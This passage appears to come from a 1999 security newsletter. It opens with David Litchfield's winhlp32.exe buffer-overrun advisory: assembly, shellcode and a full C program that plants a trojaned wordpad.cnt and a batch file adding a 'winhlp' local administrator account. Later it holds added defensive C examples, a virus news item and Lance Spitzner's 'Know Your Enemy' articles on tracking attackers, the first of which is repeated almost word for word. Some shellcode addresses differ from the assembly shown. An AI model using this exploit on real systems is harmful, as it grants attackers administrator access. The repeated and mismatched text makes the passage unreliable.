save room we won't give it an extension. The system ( ) function will try
the default executable extensions like .exe, .com and .bat and find it for us
then run it. Once it has run it the cmd.exe process system( ) has launched
will exit.
So we need to have the null terminated string "ADD" in memory and the
address of system ( ). Below is the code that will write "ADD" onto the
stack and then call system( )
/*First the procedure prologue */
push ebp
mov ebp,esp
/* We need some NULL and then push them onto the stack */
xor edi,edi
push edi
/* Now we write ADD onto the stack */
mov byte ptr [ebp-04h],41h
mov byte ptr [ebp-03h],44h
mov byte ptr [ebp-02h],44h
/* Place address of system ( ) into eax and push it onto the stack */
mov eax, 0x7801E1E1
push eax
/* Now load eax with address of ADD and push this too */
lea eax,[ebp-04h]
push eax
/* Then we call system ( ) */
call dword ptr [ebp-08h]
Once the batch file has been run the Command Interpreter will exit and if we
don't clean up after ourselves winhlp32.exe will access violate so we need
to call exit (0) to keep it quiet. exit ( ) is also exported by msvcrt.dll
at address 0x78005BBA - which has a null in it. It's not a major problem -
we can fill a register with 0xFFFFFFFF and subtract 0x87FFA445 from it. The
following code calls exit (0)
/* Procedure prologue */
push ebp
mov ebp,esp
/* Round about way of getting address of exit () into edx */
mov edx,0xFFFFFFFF
sub edx,0x87FFA445
/* Push this address onto the stack */
push edx
/* Get some nulls - this is our exit code - and push them too */
xor eax,eax
push eax
/* then call exit()! */
call dword ptr[ebp-04h]
Altogether our code looks like this:
push ebp
mov ebp,esp
xor eax,eax
push eax
push eax
push eax
mov byte ptr[ebp-0Ch],4Dh
mov byte ptr[ebp-0Bh],53h
mov byte ptr[ebp-0Ah],56h
mov byte ptr[ebp-09h],43h
mov byte ptr[ebp-08h],52h
mov byte ptr[ebp-07h],54h
mov byte ptr[ebp-06h],2Eh
mov byte ptr[ebp-05h],44h
mov byte ptr[ebp-04h],4Ch
mov byte ptr[ebp-03h],4Ch
mov edx,0x77F1381A
push edx
lea eax,[ebp-0Ch]
push eax
call dword ptr[ebp-10h]
push ebp
mov ebp,esp
xor edi,edi
push edi
mov byte ptr [ebp-04h],41h
mov byte ptr [ebp-03h],44h
mov byte ptr [ebp-02h],44h
mov eax, 0x7801E1E1
push eax
lea eax,[ebp-04h]
push eax
call dword ptr [ebp-08h]
push ebp
mov ebp,esp
mov edx,0xFFFFFFFF
sub edx,0x87FFA445
push edx
xor eax,eax
push eax
call dword ptr[ebp-04h]
Now we need the operation codes (opcodes) for all this, which we get by
writing a program that uses the __asm keyword and then debugging it. This is
what we actually load into our exploit code.
Following is the source of a program that will create a "trojaned"
wordpad.cnt. It will also create a batch file called add.bat - edit it as
you see fit. I have compiled the program - you can get a copy of it from
http://www.infowar.co.uk/mnemonix/winhlpadd.exe
Note that this will run only on standard installs of NT with service pack 4
and expects an msvcrt.dll version of 4.20.6201 - run it from the winnt\help
directory.
Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix
http://www.arca.com
#include <stdio.h>   /* printf, fopen, fprintf */
#include <stdlib.h>  /* system */

int main(void)
{
    /* Address of the JMP ESP in kernel32.dll, stored little-endian (bytes 357-360) */
    char eip[5] = "\xE5\x27\xF3\x77";
    /* 20 NOPs followed by the 127 bytes of code assembled above */
    char ExploitCode[200] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6"
        "\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54"
        "\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x1A\x38"
        "\xF1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC"
        "\x41\xC6\x45\xFD\x44\xC6\x45\xFE\x44\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50"
        "\xFF\x55\xF8\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC";
    FILE *fd;

    printf("\n\n*******************************************************\n");
    printf("* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n");
    printf("* This version runs on Service Pack 4 machines and *\n");
    printf("* assumes a msvcrt.dll version of 4.00.6201 *\n");
    printf("* *\n");
    printf("* (C) David Litchfield (mnemonix@globalnet.co.uk) '99 *\n");
    printf("*******************************************************\n\n");

    /* Make sure the real contents file is there before touching anything */
    fd = fopen("wordpad.cnt", "r");
    if (fd == NULL)
    {
        printf("\n\nWordpad.cnt not found or insufficient rights to access it.\n"
               "Run this from the WINNT\\HELP directory");
        return 0;
    }
    fclose(fd);

    printf("\nMaking a copy of real wordpad.cnt - wordpad.sav\n");
    system("copy wordpad.cnt wordpad.sav");

    printf("\n\nCreating wordpad.cnt with exploit code...");
    fd = fopen("wordpad.cnt", "w+");
    if (fd == NULL)
    {
        printf("Failed to open wordpad.cnt in write mode. Check you have sufficient rights\n");
        return 0;
    }
    /* Heading entry: 356 bytes of filler, the return address at bytes 357-360, then the code */
    fprintf(fd, "1 "
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%s%s\n", eip, ExploitCode);
    fprintf(fd, "2 Opening a document=WRIPAD_OPEN_DOC\n");
    fclose(fd);

    printf("\nCreating batch file add.bat\n\n");
    fd = fopen("add.bat", "w");
    if (fd == NULL)
    {
        printf("Couldn't create batch file. Manually create one instead");
        return 0;
    }
    printf("The batch file will attempt to create a user account called \"winhlp\" and\n");
    printf("with a password of \"winhlp!!\" and add it to the Local Administrators group.\n");
    printf("Once this is done it will reset the files and delete itself.\n");
    fprintf(fd, "net user winhlp winhlp!! /add\n");
    fprintf(fd, "net localgroup administrators winhlp /add\n");
    fprintf(fd, "del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n");
    fprintf(fd, "del wordpad.sav\n");
    fprintf(fd, "del add.bat\n");
    fclose(fd);
    printf("\nBatch file created.");
    printf("\n\nCreated. Now open up Wordpad and click on Help\n");
    return 0;
}
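The heading-string overrun described in the advisory above comes down to one thing: a .cnt line is copied into a fixed stack buffer with no length check. The C below is an added example, not part of Litchfield's advisory and not winhlp32's code. It shows that pattern next to a bounded parser and a small triage check that counts over-long headings in a .cnt file before the file is handed to a help viewer. HEADING_MAX, the function names and the sample .cnt text are assumptions modelled on the 507-byte figure quoted in the advisory, not on winhlp32's real stack layout.

```c
#include <stdio.h>
#include <string.h>

/* Assumption: models the 507-byte limit quoted in the advisory, not winhlp32's real buffer. */
#define HEADING_MAX 507

/* A .cnt entry looks like "1 Opening a document=WRIPAD_OPEN_DOC": a level number, a space,
   then the heading. Skip the level number and return a pointer to the heading text. */
static const char *split_level(const char *line, int *level)
{
    *level = 0;
    while (*line >= '0' && *line <= '9') {
        *level = *level * 10 + (*line - '0');
        line++;
    }
    if (*line == ' ')
        line++;
    return line;
}

/* The 'before' form: the heading is copied into the caller's fixed buffer with no length check.
   A heading longer than HEADING_MAX writes past the end of the buffer, which is the overrun
   class the advisory describes. Kept for comparison only; never run it on input you do not control. */
void parse_cnt_line_unsafe(const char *line, char heading[HEADING_MAX + 1], int *level)
{
    const char *text = split_level(line, level);
    strcpy(heading, text); /* BUG: unbounded copy into a fixed-size buffer */
}

/* Hardened form: the copy is bounded, the result is always NUL-terminated, and the caller is told
   when something was dropped so it can log the event. Returns the stored heading length. */
int parse_cnt_line_safe(const char *line, char heading[HEADING_MAX + 1], int *level, int *truncated)
{
    const char *text = split_level(line, level);
    size_t len = strcspn(text, "\r\n"); /* the heading runs to the end of the line */
    *truncated = len > HEADING_MAX;
    if (*truncated)
        len = HEADING_MAX;
    memcpy(heading, text, len);
    heading[len] = '\0';
    return (int)len;
}

/* Triage check over a whole .cnt file held in memory: how many entries carry a heading longer
   than HEADING_MAX, and how long the longest one is. A non-zero count on a file that arrived
   from outside is a reason not to open it with a viewer known to have this bug. */
int count_overlong_headings(const char *cnt_text, int *longest)
{
    int count = 0, level;
    *longest = 0;
    for (const char *p = cnt_text; *p; ) {
        const char *nl = strchr(p, '\n');
        size_t linelen = nl ? (size_t)(nl - p) : strlen(p);
        const char *text = split_level(p, &level);
        int hlen = (int)((p + linelen) - text);
        if (hlen > 0 && text[hlen - 1] == '\r')
            hlen--;
        if (hlen > *longest)
            *longest = hlen;
        if (hlen > HEADING_MAX)
            count++;
        if (!nl)
            break;
        p = nl + 1;
    }
    return count;
}

/* Constructed sample (not a real wordpad.cnt): two ordinary entries around one whose heading
   is 600 bytes long. Returns the number of bytes written. */
size_t build_sample_cnt(char *buf, size_t cap)
{
    size_t n = 0;
    n += (size_t)snprintf(buf + n, cap - n, "1 Opening a document=WRIPAD_OPEN_DOC\n");
    n += (size_t)snprintf(buf + n, cap - n, "1 ");
    for (int i = 0; i < 600 && n + 1 < cap; i++)
        buf[n++] = 'A';
    n += (size_t)snprintf(buf + n, cap - n, "\n2 Saving a document=WRIPAD_SAVE_DOC\n");
    return n;
}

int main(void)
{
    char buf[2048], heading[HEADING_MAX + 1];
    int longest, level, truncated;
    build_sample_cnt(buf, sizeof buf);
    printf("entries with a heading over %d bytes: %d (longest %d)\n", HEADING_MAX,
           count_overlong_headings(buf, &longest), longest);
    parse_cnt_line_safe(buf, heading, &level, &truncated);
    printf("first entry: level %d, heading \"%s\"\n", level, heading);
    return 0;
}
```

The check is deliberately independent of the viewer: it only needs the file, so it can run on a mail gateway or at install time, and the truncation flag from the safe parser is the thing worth logging, since a legitimate contents file never needs a heading anywhere near that long.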
@HWA
09.0 NAI ON GALADRIEL VIRUS
~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Saturday 22nd May 1999 on 12.18 pm CET
A couple of days ago we wrote about the Galadriel virus. This virus infects files with the
CSC extension when an infected script is run from under CorelDraw and Corel Photo
Paint 7, 8 and 9. A user is likely to notice the presence of the virus because many
scripts stop executing properly when infected and a CorelDraw error message will
occur. The CSC/CSV.A virus does not work under the WordPerfect suite as this suite
uses a different language from Corel Script. NAI categorized this virus as Low risk,
and you can update your VirusScan with these patches: VirusScan 3 & VirusScan 4.0
@HWA
10.0 Know your enemy parts 1,2 and 3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Part 1
The Attack of the Script Kiddie
Know Your Enemy
Lance Spitzner
Last Modified: May 23, 1999
My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy
is. This military doctrine readily applies to the world of network security. Just like the military, you have resources
that you are trying to protect. To help protect these resources, you need to know who your threat is and how they
are going to attack. This article does just that, it discusses the methodology and tools used by one of the most
common and universal threats, the Script Kiddie.
Who is the Script Kiddie
The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company.
Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching
the entire Internet for that exploit. Sooner or later they find someone vulnerable.
Some of them are advanced users who develop their own tools and leave behind sophisticated backdoors. Others have no idea
what they are doing and only know how to type "go" at the command prompt. Regardless of their skill level, they all share a
common strategy: randomly search for a specific weakness, then exploit that weakness.
The Threat
It is this random selection of targets that makes the script kiddie such a dangerous threat. Sooner or later your systems and
networks will be probed; you cannot hide from them. I know of admins who were amazed to have their systems scanned when
they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems
were scanned by a script kiddie who happened to be sweeping that network block.
If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds
are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed;
anyone can use them. A rapidly growing number of people are obtaining these tools. As the Internet knows
no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us.
With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed.
This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your
systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very
systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill.
The Methodology
The script kiddie methodology is a simple one: scan the Internet for a specific weakness, and when you find it, exploit it. Most of
the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your
results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First,
develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability.
For example, let's say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would
develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP
addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily
determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be
used to determine which Linux systems were running imap. All that is left now is to exploit those vulnerable systems.
You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are
not monitoring their systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single
system they can exploit. Once they have exploited a system, they use this system as a launching pad. They can boldly
scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held
liable.
Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user
develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current
imap vulnerability. However, let's say that a month from now a new Linux exploit is identified on a different port. Instead of
having to build a new database (which is the most time consuming part), the user can quickly review his archived database and
compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from
each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been
scanned recently does not mean you are secure.
The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy
and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show
up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan
the Internet. For more information on this, check out Know Your Enemy: III.
These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at
night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no
idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no
geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you.
The Tools
The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to
build an IP database. These tools are truly random, as they indiscriminately scan the Internet. For example, one tool has a single
option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects
which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tool builds an IP
database by conducting zone transfers of the domain name and all sub-domains. Users have built databases with over 2 million
IPs by scanning the entire .com or .edu domain.
Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating
system, or services running on the system. Once the vulnerable systems have been identified, the blackhat strikes. Several tools
exist that combine all these features together, simplifying the process even further, such as sscan by jsbach. For a better
understanding of how these tools are used, check out Know Your Enemy: II.
How to Protect Against This Threat
There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are
looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both
http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is
one of the best sources of information.
Another way to protect yourself is to run only the services you need. If you do not need a service, turn it off. If you do need a
service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris, Armoring Linux or
Armoring NT.
As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit
the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on
them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can
find at http://www.isc.org/bind.html.
Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the
threats to your network and react to these threats.
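One way to act on the zone-transfer advice above (restrict who may transfer, then log and follow up on anyone else who tries) and on the last point about watching for probes, as an added C example that is not part of Spitzner's paper or of BIND: it walks name-server log lines, picks out AXFR requests, and reports every one that came from a host not on the list of secondaries you configured. The log lines are constructed, modelled loosely on BIND 9's xfer-out messages rather than captured from a real server, and the allow-list, the addresses and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample log lines (modelled on BIND 9 xfer-out messages; not from a real server).
   192.0.2.10 and 192.0.2.11 are the secondaries we expect to pull zones; the others are not. */
static const char *const SAMPLE_LOG[] = {
    "client 192.0.2.10#4321: transfer of 'example.com/IN': AXFR started",
    "client 198.51.100.77#1025: transfer of 'example.com/IN': AXFR started",
    "client 192.0.2.10#4321: transfer of 'example.com/IN': AXFR ended",
    "client 203.0.113.5#2048: transfer of 'example.com/IN': AXFR started",
    "client 192.0.2.11#5555: query: www.example.com IN A",
    "client 203.0.113.5#2049: transfer of 'example.com/IN': AXFR started",
};
#define SAMPLE_LOG_N (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

/* The hosts allowed to transfer zones: the same list that belongs in named.conf's allow-transfer. */
static const char *const ALLOWED_SECONDARIES[] = { "192.0.2.10", "192.0.2.11" };
#define ALLOWED_N (sizeof ALLOWED_SECONDARIES / sizeof ALLOWED_SECONDARIES[0])

#define IP_LEN 16 /* dotted quad plus NUL */

/* Pull the client address out of "client A.B.C.D#port: ...".
   Returns 1 on success, 0 if the line carries no client field or the address does not fit. */
int parse_client_ip(const char *line, char ip[IP_LEN])
{
    const char *start = strstr(line, "client ");
    if (!start)
        return 0;
    start += strlen("client ");
    const char *end = strchr(start, '#');
    if (!end || (size_t)(end - start) >= IP_LEN)
        return 0;
    memcpy(ip, start, (size_t)(end - start));
    ip[end - start] = '\0';
    return 1;
}

/* Does this line record the start of a full zone transfer? */
int is_axfr_start(const char *line)
{
    return strstr(line, "AXFR started") != NULL;
}

int is_allowed_secondary(const char *ip)
{
    for (size_t i = 0; i < ALLOWED_N; i++)
        if (strcmp(ip, ALLOWED_SECONDARIES[i]) == 0)
            return 1;
    return 0;
}

/* Walk the log, count AXFR starts from hosts outside the allow-list, and record up to max_out
   distinct offending addresses in offenders. Returns the number of unauthorized attempts. */
int count_unauthorized_axfr(const char *const *lines, size_t n,
                            char offenders[][IP_LEN], size_t max_out, size_t *n_out)
{
    int count = 0;
    char ip[IP_LEN];
    *n_out = 0;
    for (size_t i = 0; i < n; i++) {
        if (!is_axfr_start(lines[i]) || !parse_client_ip(lines[i], ip) || is_allowed_secondary(ip))
            continue;
        count++;
        int seen = 0;
        for (size_t j = 0; j < *n_out; j++)
            if (strcmp(offenders[j], ip) == 0) { seen = 1; break; }
        if (!seen && *n_out < max_out)
            strcpy(offenders[(*n_out)++], ip); /* ip is shorter than IP_LEN by construction */
    }
    return count;
}

int main(void)
{
    char offenders[8][IP_LEN];
    size_t n_off;
    int hits = count_unauthorized_axfr(SAMPLE_LOG, SAMPLE_LOG_N, offenders, 8, &n_off);
    printf("%d unauthorized zone transfer attempt(s) from %zu host(s)\n", hits, n_off);
    for (size_t i = 0; i < n_off; i++)
        printf("  follow up: %s\n", offenders[i]);
    return 0;
}
```

The same two addresses belong in named.conf as `allow-transfer { 192.0.2.10; 192.0.2.11; };` so that the server refuses the transfer in the first place; the log check then tells you who tried, which is the list of hosts the paper says to follow up on. Feed it real log lines and the per-host list becomes the start of your probe-tracking record.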
Conclusion
The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value.
Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems
against this threat.
NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article
Author's bio
Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
Whitepapers / Publications
The Attack of the Script Kiddie
Know Your Enemy
Lance Spitzner
Last Modified: May 23, 1999
My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy
is. This military doctrine readily applies to the world of network security. Just like the military, you have resources
that you are trying to protect. To help protect these resources, you need to know who your threat is and how they
are going to attack. This article does just that, it discusses the methodology and tools used by one of the most
common and universal threats, the Script Kiddie.
Who is the Script Kiddie
The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company.
Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching
the entire Internet for that exploit. Sooner or later they find someone vulnerable.
Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea
what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a
common strategy, randomly search for a specific weakness, then exploit that weakness.
The Threat
It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and
networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when
they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems
were scanned by a script kiddie who happened to be sweeping that network block.
If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds
are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed,
anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows
no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us.
With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed.
This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your
systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very
systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill.
The Methodology
The script kiddie methodology is a simple one: scan the Internet for a specific weakness, and when you find it, exploit it. Most of
the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your
results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First,
develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability.
For example, let's say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would
develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP
addresses is built, the user would want to determine which systems were running Linux. Many scanners today, such as Fyodor's
nmap, can easily determine this by sending bad packets to a system and seeing how it responds. Then, tools would be
used to determine which Linux systems were running imap. All that is left now is to exploit those vulnerable systems.
You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are
not monitoring their systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single
system they can exploit. Once they have exploited a system, they use this system as a launching pad. They can boldly
scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held
liable.
Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user
develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current
imap vulnerability. However, let's say that a month from now a new Linux exploit is identified on a different port. Instead of
having to build a new database (which is the most time consuming part), the user can quickly review his archived database and
compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from
each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been
scanned recently does not mean you are secure.
The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy
and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show
up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan
the Internet. For more information on this, check out Know Your Enemy: III.
These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at
night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no
idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no
geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you.
The Tools
The tools used are extremely simple to use. Most are limited to a single purpose with few options. First come the tools used to
build an IP database. These tools are truly random, as they indiscriminately scan the Internet. For example, one tool has a single
option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects
which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tool builds an IP
database by conducting zone transfers of the domain name and all sub-domains. Users have built databases with over 2 million
IPs by scanning the entire .com or .edu domain.
Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating
system, or services running on the system. Once the vulnerable systems have been identified, the blackhat strikes. Several tools
exist that combine all these features together, simplifying the process even further, such as sscan by jsbach. For a better
understanding of how these tools are used, check out Know Your Enemy: II.
How to Protect Against This Threat
There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill: they are
looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both
http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is
one of the best sources of information.
Another way to protect yourself is to run only the services you need. If you do not need a service, turn it off. If you do need a
service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris, Armoring Linux or
Armoring NT.
As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit
the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on
them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can
find at http://www.isc.org/bind.html.
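As an added example of the zone-transfer restriction described above (not the article's own configuration), this named.conf fragment assumes BIND 8/9 syntax, a single secondary name server at 192.168.1.2 (placeholder) and a log file path chosen for the example. Transfers from any other address are refused, and BIND reports the refusal under its "security" log category, which is what you then follow up on.

```conf
// Added example, not from the article. 192.168.1.2 and the log path are placeholders.
logging {
    channel xfer_log {
        file "/var/log/named-security.log";
        severity info;
        print-time yes;
    };
    // Refused zone transfers (and other access denials) are reported here.
    category security { xfer_log; };
};

options {
    directory "/var/named";
    // Only the listed secondary may pull zones; everyone else is refused
    // and the refusal is logged through the channel above.
    allow-transfer { 192.168.1.2; };
};
```

The same allow-transfer statement can be placed inside an individual zone block when different zones have different secondaries.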
Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the
threats to your network and react to these threats.
Conclusion
The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value.
Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems
against this threat.
NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article
Author's bio
Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net.
Part 2
Tracking their moves
Know Your Enemy: II
Lance Spitzner
Last Modified: May 23, 1999
In the first article, Know Your Enemy, we covered the tools and methodologies of the Script Kiddie. Specifically,
how they probe for vulnerabilities and then attack. Now we will cover how to track their movements. Just as in
the military, you want to track the bad guys and know what they are doing. We will cover what you can, and cannot,
determine with your system logs. You may be able to determine if you are being probed, what you were being
probed for, what tools were used, and if they were successful. The examples provided here focus on Linux, but can
apply to almost any flavor of Unix. Keep in mind, there is no guaranteed way to track the enemy's every step.
However, this article is a good place to start.
Securing Your Logs
This article is not about intrusion detection; there are a variety of excellent sources that cover IDS. If you are interested in
intrusion detection, I recommend checking out applications such as Network Flight Recorder or swatch. This article focuses
on intelligence gathering. Specifically, how to figure out what the enemy is doing by reviewing your system logs. You will be
surprised how much information you will find in your own log files. However, before we can talk about reviewing your logs, we
first have to discuss securing your system logs. Your log files are worthless if you cannot trust their integrity. The first
thing most blackhats do is alter log files on a compromised system. There are a variety of rootkits that will wipe out their
presence from log files (such as cloak), or alter logging altogether (such as trojaned syslogd binaries). So, the first step to
reviewing your logs is securing your logs.
This means you will need to use a remote log server. Regardless of how secure your system is, you cannot trust your logs on a
compromised system. If nothing else, the blackhat can simply do a rm -rf /* on your system, wiping your hard drive clean.
This makes recovering your logs somewhat difficult. To protect against this, you will want all your systems to log traffic both
locally and to a remote log server. I recommend making your log server a dedicated system, i.e. the only thing it should be
doing is collecting logs from other systems. If money is an issue, you can easily build a Linux box to act as your log server.
This server should be highly secured, with all services shut off, allowing only console access (see Armoring Linux for an
example). Also, ensure that port 514 UDP is blocked or firewalled at your Internet connection. This protects your log server
from receiving bad or unauthorized logging information from the Internet.
For those of you who like to get sneaky, something I like to do is recompile syslogd to read a different configuration file, such
as /var/tmp/.conf. This way the blackhat does not realize where the real configuration file is. This is simply done by changing
the entry "/etc/syslog.conf" in the source code to whatever file you want. We then set up our new configuration file to log both
locally and to the remote log server (see example). Make sure you maintain a standard copy of the configuration file,
/etc/syslog.conf, which points to all local logging. Even though this configuration file is now useless, it will keep the
blackhat from realizing the true destination of our remote logging. Another option for your systems is to use a secure method of
logging. One option is to replace your syslogd binary with something that has integrity checking and a greater breadth of
options. One such replacement is syslog-ng, which you can find at http://www.balabit.hu/products/syslog-ng.html.
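The configuration the paragraph above refers to is not reproduced in the article, so here is an added example (not the author's file) of a syslog.conf that keeps the usual local files and duplicates everything to the dedicated log server. It assumes the server is reachable as "loghost" (placeholder name) and that its syslogd accepts remote messages on UDP 514 from the internal network only.

```conf
# Added example, not the article's own configuration. "loghost" is a placeholder.

# Local copies, as a stock Linux syslog.conf of the period would keep them.
*.info;mail.none;authpriv.none        /var/log/messages
authpriv.*                            /var/log/secure
mail.*                                /var/log/maillog

# Duplicate every message to the remote log server. syslogd forwards each
# entry as it arrives, so anything logged before a rootkit wipes the local
# files has already left the box.
*.*                                   @loghost
```

With the decoy trick above, this is the file installed at the hidden path compiled into syslogd, while the stock /etc/syslog.conf keeps only the local lines; on a Linux sysklogd log server the daemon must be started with -r to accept remote messages at all.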
Most of the logs we will use are the ones stored on the remote log server. As mentioned earlier, we can be fairly confident of
the integrity of these logs since they are on a remote and secured system. Also, since all systems are logging to a single source,
it is much easier to identify patterns in these logs. We can quickly review what's happening to all the systems in one source.
The only time you would want to review logs stored locally on a system is to compare them to what the log server has. You
can determine if the local logs have been altered by comparing them to the remote logs.
Pattern Matching
By looking at your log entries, you can usually determine if you are being port scanned. Most Script Kiddies scan a network
